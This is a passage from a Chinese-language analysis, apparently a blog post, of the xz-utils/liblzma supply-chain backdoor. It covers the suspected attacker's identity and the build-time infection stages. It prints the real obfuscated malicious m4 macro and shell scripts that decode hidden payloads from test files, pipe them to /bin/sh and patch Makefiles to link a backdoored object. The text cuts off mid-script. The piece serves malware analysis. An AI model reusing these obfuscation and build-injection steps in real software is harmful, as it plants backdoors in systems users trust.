tan还在尝试向Linux内核提交代码更新功能（暂未发现直接的恶意代码），并且该代码已进入Linux-next，事发后被叫停。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012972" data-ratio="0.6898148148148148" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9218f85a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGeavYY4KZehDjVQun2VLOPUxwG7qno9kdLevYEJSic0iaoJDBaSta5KvA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section style="margin-top: 16px;"><span style="font-size: 14px;">上游新版本发布后，JiaT75则开始了积极策划使其再次进入Linux发行版，如下图的Ubuntu。</span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012962" data-ratio="1.2626666666666666" data-s="300,640" style="" data-type="png" data-w="750" src="https://wechat2rss.xlab.app/img-proxy/?k=8db871b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGUfvSicBxIqof99tVlcaoBacgIAp71l2QjaicNSVmAHC0sh59xiaOyq6ZA%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/></p><p><span style="font-size: 14px;">如下图的debian，ID“hansjans162”和前面的ifunc提交相同。</span><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012963" data-ratio="0.812037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=940569b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBG35nxpxyC0c0gCSKM4iclNgvnxA0mQnzbWuZia3GuAiaWo1iajheezuVgXA%2F640%3Fwx_fmt%3Dother%26from%3Dappmsg"/><br/></p><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">02</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;"><strong style="box-sizing: border-box;">投毒者信息<br/></strong></span></p></section></section></section></section><section style="margin-top: 16px;"><span style="font-size: 14px;">此次提交恶意文件的用户从提交日志来看有如下其他用户名。</span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="perl"><code><span class="code-snippet_outer">$ git shortlog --summary --numbered --email | <span class="code-snippet__keyword">grep</span> jiat0218@gmail.com</span></code><code><span class="code-snippet_outer"><span class="code-snippet__number">273</span> Jia Tan &lt;jiat0218@gmail.com&gt;</span></code><code><span class="code-snippet_outer"><span class="code-snippet__number">2</span> jiat75 &lt;jiat0218@gmail.com&gt;</span></code><code><span class="code-snippet_outer"><span class="code-snippet__number">1</span> Jia Cheong Tan &lt;jiat0218@gmail.com&gt;</span></code></pre></section><section style="margin-top: 16px;"><span style="font-size: 14px;">如果GitHub账户jiat75是这次的事件次精心策划者的话，从其使用的用户名Jia Tan和GitHub 提交时间来看（东八时区），可能有意伪造相关身份来证明其是位于东亚。不过又有新的观点认为其是欧州人/以色列人冒充的中国人，支撑点有如下三个。</span><br/></section><p style="margin-top: 16px;margin-bottom: 0px;"><strong><span style="font-size: 14px;">1、提交记录的时区信息：</span></strong><span style="font-size: 14px;">观察到此人有在东二时区（冬季）和东三时区（夏季）的提交记录，这与欧洲/以色列地区实行的夏令时制度相吻合，而不是一直在东八时区（中国时区）。</span></p><section style="margin-top: 16px;"><strong><span style="font-size: 14px;">2、时区之间的快速切换：</span></strong><span style="font-size: 14px;">在2022年10月6日，此人在不到10小时内，先后在东八时区和东三时区提交代码，这几乎排除了他在这短时间内实际从中国移动到欧洲的可能性。</span></section><section style="margin-top: 16px;"><span style="font-size: 14px;"><strong>3、假日提交记录的差异：</strong>此人在中国的重要农历假日（如中秋节、清明节、春节）有提交记录，但在欧洲的主要节日（如圣诞节和新年）却没有提交记录。</span></section><p><span style="font-size: 14px;">目前从整理出的全部信息来看，还无法确定JiaT75究竟是个人还是组织。</span><br/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: inline-block;counter-increment: counterh2 1;color: rgb(143, 220, 143);border-bottom: 4px solid rgb(143, 220, 143);font-size: 18px;padding: 2px 4px;letter-spacing: 0.5px;">0x04 源代码分析</span></h2><p><span style="font-size: 14px;">此次攻击的大致流程如下所示：<br/></span></p><section style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">1、通过源代码m4目录下的build-to-host.m4文件及tests目录下的bad-3-corrupt_lzma2.xz和good-large_compressed.lzma文件，将包含后门代码的liblzma_la-crc64-fast.o目标文件提取出来，然后用其链接生成最终的恶意liblzma.so文件。</span></section><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">2、利用glibc的IFUNC特性，获得在sshd进程加载liblzma.so库时执行后门代码的能力。通过后门代码Hook sshd进程中RSA_public_decrypt()函数的GOT表条目。</span></p><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">3、攻击者通过SSH公钥登录方式，使用特定的RSA私钥连接目标机器进行身份验证。sshd进程会通过RSA_public_decrypt()函数对攻击者发送的RSA私钥进行解密，该RSA私钥中包含攻击者想要执行的payload，由此可知，本次后门可造成远程代码执行。</span></p><section style="margin-top: 16px;"><span style="font-size: 14px;"></span></section><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">01</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;">编译恶意的liblzma.so文件<br/></p></section></section></section></section><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">由于阶段三中执行的good-large_compressed.sh脚本会检查源代码目录下是否存在/debian/rules文件，可以选择debian的xz-utils源码进行编译，或者在上游xz-utils源码创建这样一个文件后，就能成功编译包含后门代码的liblzma.so库。</span></p><section style="margin-top: 16px;margin-bottom: 24px;"><span style="font-size: 14px;">debian的xz-utils v5.6.0-0.2的链接如下所示。<br/><a href="https://salsa.debian.org/debian/xz-utils/-/tree/debian/5.6.0-0.2?ref_type=tags" target="_blank">https://salsa.debian.org/debian/xz-utils/-/tree/debian/5.6.0-0.2?ref_type=tags</a></span></section><p><strong><span style="font-size: 16px;">阶段一</span></strong><br/></p><p><span style="font-size: 14px;">在构建xz-utils的过程中，通过执行源代码根目录下的configure脚本生成Makefile文件时，会执行build-to-host.m4文件中的宏。此文件中的宏代码用于对./tests/files/bad-3-corrupt_lzma2.xz文件进行修复，解压，然后获得用于阶段二执行的脚本代码（命名为bad-3-corrupt_lzma2.sh）并执行。build-to-host.m4文件中的关键代码如下所示。</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="php"><code><span class="code-snippet_outer"><span class="code-snippet__comment">// ./m4/build-to-host.m4</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">// 找到包含“####Hello####”内容的文件的名称</span></span></code><code><span class="code-snippet_outer">gl_am_configmake=`grep -aErls <span class="code-snippet__string">&#34;#{4}[[:alnum:]]{5}#{4}$&#34;</span> $srcdir/ <span class="code-snippet__number">2</span>&gt;/dev/<span class="code-snippet__keyword">null</span>`</span></code><code><span class="code-snippet_outer">❯ grep -aErls <span class="code-snippet__string">&#34;#{4}[[:alnum:]]{5}#{4}$&#34;</span> . <span class="code-snippet__number">2</span>&gt;/dev/<span class="code-snippet__keyword">null</span></span></code><code><span class="code-snippet_outer">./tests/files/bad<span class="code-snippet__number">-3</span>-corrupt_lzma2.xz</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">// 获取xz程序的名字</span></span></code><code><span class="code-snippet_outer">gl_[$<span class="code-snippet__number">1</span>]_prefix=`<span class="code-snippet__keyword">echo</span> $gl_am_configmake | sed <span class="code-snippet__string">&#34;s/.*\.//g&#34;</span>`</span></code><code><span class="code-snippet_outer">❯ <span class="code-snippet__keyword">echo</span> ./tests/files/bad<span class="code-snippet__number">-3</span>-corrupt_lzma2.xz | sed <span class="code-snippet__string">&#34;s/.*\.//g&#34;</span></span></code><code><span class="code-snippet_outer">xz</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">// 修复bad-3-corrupt_lzma2.xz文件，并对其解压，获得bad-3-corrupt_lzma2.sh脚本文件，然后执行它</span></span></code><code><span class="code-snippet_outer">gl_path_map=<span class="code-snippet__string">&#39;tr &#34;\t \-_&#34; &#34; \t_\-&#34;&#39;</span></span></code><code><span class="code-snippet_outer">gl_[$<span class="code-snippet__number">1</span>]_config=<span class="code-snippet__string">&#39;sed \&#34;r\n\&#34; $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2&gt;/dev/null&#39;</span></span></code><code><span class="code-snippet_outer">sed <span class="code-snippet__string">&#34;r\n&#34;</span> ./tests/files/bad<span class="code-snippet__number">-3</span>-corrupt_lzma2.xz | <span class="code-snippet__keyword">eval</span> <span class="code-snippet__string">&#39;tr &#34;\t \-_&#34; &#34; \t_\-&#34;&#39;</span> | xz -d <span class="code-snippet__number">2</span>&gt;/dev/<span class="code-snippet__keyword">null</span></span></code></pre></section><section style="margin-top: 16px;"><span style="font-size: 14px;">对bad-3-corrupt_lzma2.xz文件的修复是通过tr &#34;\t \-_&#34; &#34; \t_\-&#34;命令实现的，其过程如下所示：<br/></span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="sql"><code><span class="code-snippet_outer">0x09(\t) <span class="code-snippet__comment">--&gt; 0x20(空格)</span></span></code><code><span class="code-snippet_outer">0x20(空格) <span class="code-snippet__comment">--&gt; 0x09(\t)</span></span></code><code><span class="code-snippet_outer">0x2d(-) <span class="code-snippet__comment">--&gt; 0x5f(_)</span></span></code><code><span class="code-snippet_outer">0x5f(_) <span class="code-snippet__comment">--&gt; 0x2d(-)</span></span></code></pre></section><section style="margin-top: 16px;"><span style="font-size: 14px;">通过对build-to-host.m4文件中的宏代码的分析，可以手动修复bad-3-corrupt_lzma2.xz文件，并获得阶段二执行的bad-3-corrupt_lzma2.sh脚本。<br/></span></section><p><strong><span style="font-size: 16px;">阶段二<br/></span></strong></p><p><span style="font-size: 14px;">阶段二执行的bad-3-corrupt_lzma2.sh脚本的内容如下所示。<br/></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="bash"><code><span class="code-snippet_outer"><span class="code-snippet__comment"># bad-3-corrupt_lzma2.sh, xz-5.6.0</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">####Hello####</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">#†ùZ÷.hj¼</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">eval</span> `grep ^srcdir= config.status`</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">if</span> <span class="code-snippet__built_in">test</span> -f ../../config.status;<span class="code-snippet__keyword">then</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">eval</span> `grep ^srcdir= ../../config.status`</span></code><code><span class="code-snippet_outer">srcdir=<span class="code-snippet__string">&#34;../../<span class="code-snippet__variable">$srcdir</span>&#34;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">fi</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">export</span> i=<span class="code-snippet__string">&#34;((head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +724)&#34;</span>;(xz -dc <span class="code-snippet__variable">$srcdir</span>/tests/files/good-large_compressed.lzma|<span class="code-snippet__built_in">eval</span> <span class="code-snippet__variable">$i</span>|tail -c +31265|tr <span class="code-snippet__string">&#34;\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131&#34;</span> <span class="code-snippet__string">&#34;\0-\377&#34;</span>)|xz -F raw --lzma1 -dc|/bin/sh</span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">####World####</span></span></code></pre></section><section style="margin-top: 16px;"><span style="font-size: 14px;">bad-3-corrupt_lzma2.sh脚本的内容进行了一定程度的混淆，对其进行分解，可获得以下步骤。<br/></span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="perl"><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 1. 解压./tests/files/good-large_compressed.lzma文件</span></span></code><code><span class="code-snippet_outer">xz -dc $srcdir/tests/files/good-large_compressed.lzma</span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 2. 对good-large_compressed.lzma文件解压后的文件进行处理</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">eval</span> $i</span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 3. 只获取第2步结果的末尾31265字节数据</span></span></code><code><span class="code-snippet_outer">tail -c +<span class="code-snippet__number">31265</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 4. 对第3步结果中的一些数据进行替换</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">tr</span> <span class="code-snippet__string">&#34;\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131&#34;</span> <span class="code-snippet__string">&#34;\0-\377&#34;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 5. 解压第4步获得的正确的压缩文件</span></span></code><code><span class="code-snippet_outer">xz -F raw --lzma1 -dc</span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 6. 从第5步的输出中获得阶段三的脚本并执行。</span></span></code><code><span class="code-snippet_outer">/bin/sh</span></code></pre></section><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">第2步对good-large_compressed.lzma文件解压后的文件进行处理，首先通过“head -c +1024 &gt;/dev/null”命令将该文件的前1024字节数据丢弃，然后通过“head -c +2048”命令将该文件前1024字节之后的2048字节数据输出到标准输出，以此模式，不断循环，直到将所有无用数据剔除，只留下有效的数据，以待第3步继续处理。所以，good-large_compressed.lzma文件解压后的文件中的数据是无用数据与有用数据交叉分布的。</span><br/></p><p style="margin-bottom: 0px;margin-top: 16px;"><span style="font-size: 14px;">由上可知，bad-3-corrupt_lzma2.sh脚本用于解压good-large_compressed.lzma文件，然后对解压后的文件进行处理，获得另一个压缩包。对其解压后，获得阶段三执行的脚本（命名为good-large_compressed.sh）。</span></p><p style="margin-bottom: 0px;margin-top: 16px;"><span style="font-size: 14px;">可以对bad-3-corrupt_lzma2.sh文件做一些修改，以独立获得good-large_compressed.sh。<br/></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="css"><code><span class="code-snippet_outer"># 将<span class="code-snippet__selector-tag">good-large_compressed</span><span class="code-snippet__selector-class">.lzma</span>于此脚本放于同一目录</span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">xz</span> <span class="code-snippet__selector-tag">-dc</span> <span class="code-snippet__selector-tag">good-large_compressed</span><span class="code-snippet__selector-class">.lzma</span></span></code><code><span class="code-snippet_outer"># 将标准输出重定向到<span class="code-snippet__selector-tag">good-large_compressed</span><span class="code-snippet__selector-class">.sh</span>文件中</span></code><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">xz</span> <span class="code-snippet__selector-tag">-F</span> <span class="code-snippet__selector-tag">raw</span> <span class="code-snippet__selector-tag">--lzma1</span> <span class="code-snippet__selector-tag">-dc</span> 1&gt;<span class="code-snippet__selector-tag">good-large_compressed</span><span class="code-snippet__selector-class">.sh</span></span></code></pre></section><p><span style="font-size: 14px;"><strong><span style="font-size: 16px;">阶段三<br/></span></strong></span></p><section style="margin-top: 16px;"><span style="font-size: 14px;">阶段三执行的good-large_compressed.sh脚本会执行两次，第一次用来修改/src/liblzma文件夹下的Makefile，在源代码根目录下，使用阶段二的bad-3-corrupt_lzma2.sh脚本对good-large_compressed.lzma文件进行处理并执行。第一次执行good-large_compressed.sh脚本时，会对/src/liblzma文件夹下的Makefile进行修改，其中包含第二次执行good-large_compressed.sh脚本的命令。第二次用来从good-large_compressed.lzma文件中提取出恶意的liblzma_la-crc64-fast.o目标文件，并对/src/liblzma/check/文件夹下的crc64_fast.c和crc32_fast.c文件的内容做一些修改，然后用恶意的liblzma_la-crc64-fast.o文件替换原始的liblzma_la-crc64_fast.o文件，继续完成接下来的编译链接过程，最终生成恶意的liblzma.so文件。<br/></span></section><p><span style="font-size: 14px;">第一次执行的good-large_compressed.sh脚本中的主要代码如下所示。</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="perl"><code><span class="code-snippet_outer">P=<span class="code-snippet__string">&#34;-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections&#34;</span></span></code><code><span class="code-snippet_outer">C=<span class="code-snippet__string">&#34;pic_flag=\&#34; $P\&#34;&#34;</span></span></code><code><span class="code-snippet_outer">O=<span class="code-snippet__string">&#34;^pic_flag=\&#34; -fPIC -DPIC\&#34;$&#34;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">R=&#34;</span>is_arch_extension_supported<span class="code-snippet__string">&#34;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">x=&#34;</span>__get_cpuid(<span class="code-snippet__string">&#34;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">p=&#34;</span>good-large_compressed.lzma<span class="code-snippet__string">&#34;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">U=&#34;</span>bad-<span class="code-snippet__number">3</span>-corrupt_lzma2.xz<span class="code-snippet__string">&#34;</span></span></code><code><span class="code-snippet_outer">eval $zrKcVq</span></code><code><span class="code-snippet_outer"># 第一次执行此脚本时，是在源代码根目录下执行的。</span></code><code><span class="code-snippet_outer">if test -f config.status; then</span></code><code><span class="code-snippet_outer">    ......</span></code><code><span class="code-snippet_outer">    eval `grep ^build=\&#39;x86_64 config.status`</span></code><code><span class="code-snippet_outer">    eval `grep ^enable_shared=\&#39;yes\&#39; config.status`</span></code><code><span class="code-snippet_outer">    eval `grep ^enable_static=\&#39; config.status`</span></code><code><span class="code-snippet_outer">    eval `grep ^gl_path_map=\&#39; config.status`</span></code><code><span class="code-snippet_outer">    eval $zrKccj</span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">    # 查找config.status文件中是否有D[&#34;</span>HAVE_FUNC_ATTRIBUTE_IFUNC<span class="code-snippet__string">&#34;]=&#34;</span> <span class="code-snippet__number">1</span><span class="code-snippet__string">&#34;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">    if ! grep -qs &#39;\[&#34;</span>HAVE_FUNC_ATTRIBUTE_IFUNC<span class="code-snippet__string">&#34;\]=&#34;</span> <span class="code-snippet__number">1</span><span class="code-snippet__string">&#34;&#39; config.status &gt; /dev/null 2&gt;&amp;1;then</span></span></code><code><span class="code-snippet_outer">        exit 0</span></code><code><span class="code-snippet_outer">    fi</span></code><code><span class="code-snippet_outer">    # 查找config.h文件中是否有#define HAVE_FUNC_ATTRIBUTE_IFUNC 1</span></code><code><span class="code-snippet_outer">    if ! grep -qs &#39;define HAVE_FUNC_ATTRIBUTE_IFUNC 1&#39; config.h &gt; /dev/null 2&gt;&amp;1;then</span></code><code><span class="code-snippet_outer">        exit 0</span></code><code><span class="code-snippet_outer">    fi</span></code><code><span class="code-snippet_outer">    # 判断enable_shared选项的值是否为yes</span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">    if test &#34;</span><span class="code-snippet__keyword">x</span>$enable_shared<span class="code-snippet__string">&#34; != &#34;</span>xyes<span class="code-snippet__string">&#34;;then</span></span></code><code><span class="code-snippet_outer">        exit 0</span></code><code><span class="code-snippet_outer">    fi</span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">    # 判断build选项的值中是否包含&#34;</span>x86_64<span class="code-snippet__string">&#34;和&#34;</span>linux-gnu<span class="code-snippet__string">&#34;</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">    if ! (echo &#34;</span>$build<span class="code-snippet__string">&#34; | grep -Eq &#34;</span>^x86_64<span class="code-snippet__string">&#34; &gt; /dev/null 2&gt;&amp;1) &amp;&amp; (echo &#34;</span>$build<span class="code-snippet__string">&#34; | grep -Eq &#34;</span>linux-gnu$&#34; &gt; <span class="code-snippet__regexp">/dev/null</span> <span class="code-snippet__number">2</span>&gt;&amp;<span class="code-snippet__number">1</span>);then</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">exit</span> <span class="code-snippet__number">0</span></span></code><code><span class="code-snippet_outer">    fi</span></code><code><span class="code-snippet_outer">    ......</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment"># 判断是否存在./debian/rules文件以及$RPM_ARCH环境变量设置为x86_64</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> test -f <span class="code-snippet__string">&#34;$srcdir/debian/rules&#34;</span> || test <span class="code-snippet__string">&#34;x$RPM_ARCH&#34;</span> = <span class="code-snippet__string">&#34;xx86_64&#34;</span>;then</span></code><code><span class="code-snippet_outer">        ......</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment"># 修改/src/liblzma/Makefile文件的内容</span></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">eval</span> $zrKcTy</span></code><code><span class="code-snippet_outer">        b=<span class="code-snippet__string">&#34;am__test = $U&#34;</span></span></code><code><span class="code-snippet_outer">        sed -i <span class="code-snippet__string">&#34;/$j/i$b&#34;</span> src/liblzma/Makefile || true</span></code><code><span class="code-snippet_outer">        d=<span class="code-snippet__string">`echo $gl_path_map | sed &#39;s/\\\/\\\\\\\\/g&#39;`</span></span></code><code><span class="code-snippet_outer">        b=<span class="code-snippet__string">&#34;am__strip_prefix = $d&#34;</span></span></code><code><span class="code-snippet_outer">        sed -i <span class="code-snippet__string">&#34;/$w/i$b&#34;</span> src/liblzma/Makefile || true</span></code><code><span class="code-snippet_outer">        b=<span class="code-snippet__string">&#34;am__dist_setup = \$(am__strip_prefix) | xz -d 2&gt; /dev/null | \$(SHELL)&#34;</span></span></code><code><span class="code-snippet_outer">        sed -i <span class="code-snippet__string">&#34;/$E/i$b&#34;</span> src/liblzma/Makefile || true</span></code><code><span class="code-snippet_outer">        b=<span class="code-snippet__string">&#34;\$(top_srcdir)/tests/files/\$(am__test)&#34;</span></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">s</span>=<span class="code-snippet__string">&#34;am__test_dir=$b&#34;</span></span></code><code><span class="code-snippet_outer">        sed -i <span class="code-snippet__string">&#34;/$Q/i$s&#34;</span> src/liblzma/Makefile || true</span></code><code><span class="code-snippet_outer">        h=<span class="code-snippet__string">&#34;-Wl,--sort-section=name,-X&#34;</span></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">if</span> ! echo <span class="code-snippet__string">&#34;$LDFLAGS&#34;</span> | <span class="code-snippet__keyword">grep</span> -qs -e <span class="code-snippet__string">&#34;-z,now&#34;</span> -e <span class="code-snippet__string">&#34;-z -Wl,now&#34;</span> &gt; <span class="code-snippet__regexp">/dev/null</span> <span class="code-snippet__number">2</span>&gt;&amp;<span class="code-snippet__number">1</span>;then</span></code><code><span class="code-snippet_outer">            h=$h<span class="code-snippet__string">&#34;,-z,now&#34;</span></span></code><code><span class="code-snippet_outer">        fi</span></code><code><span class="code-snippet_outer">        j=<span class="code-snippet__string">&#34;liblzma_la_LDFLAGS += $h&#34;</span></span></code><code><span class="code-snippet_outer">        sed -i <span class="code-snippet__string">&#34;/$L/i$j&#34;</span> src/liblzma/Makefile || true</span></code><code><span class="code-snippet_outer">        sed -i <span class="code-snippet__string">&#34;s/$O/$C/g&#34;</span> libtool || true</span></code><code><span class="code-snippet_outer">        k=<span class="code-snippet__string">&#34;AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))&#34;</span></span></code><code><span class="code-snippet_outer">        sed -i <span class="code-snippet__string">&#34;s/$u/$k/&#34;</span> src/liblzma/Makefile || true</span></code><code><span class="code-snippet_outer">        l=<span class="code-snippet__string">&#34;LTDEPS=&#39;\$(lib_LTDEPS)&#39;; \\\\\n\</span></span></code><code><span class="code-snippet_outer">        export top_srcdir=&#39;\$(top_srcdir)&#39;; 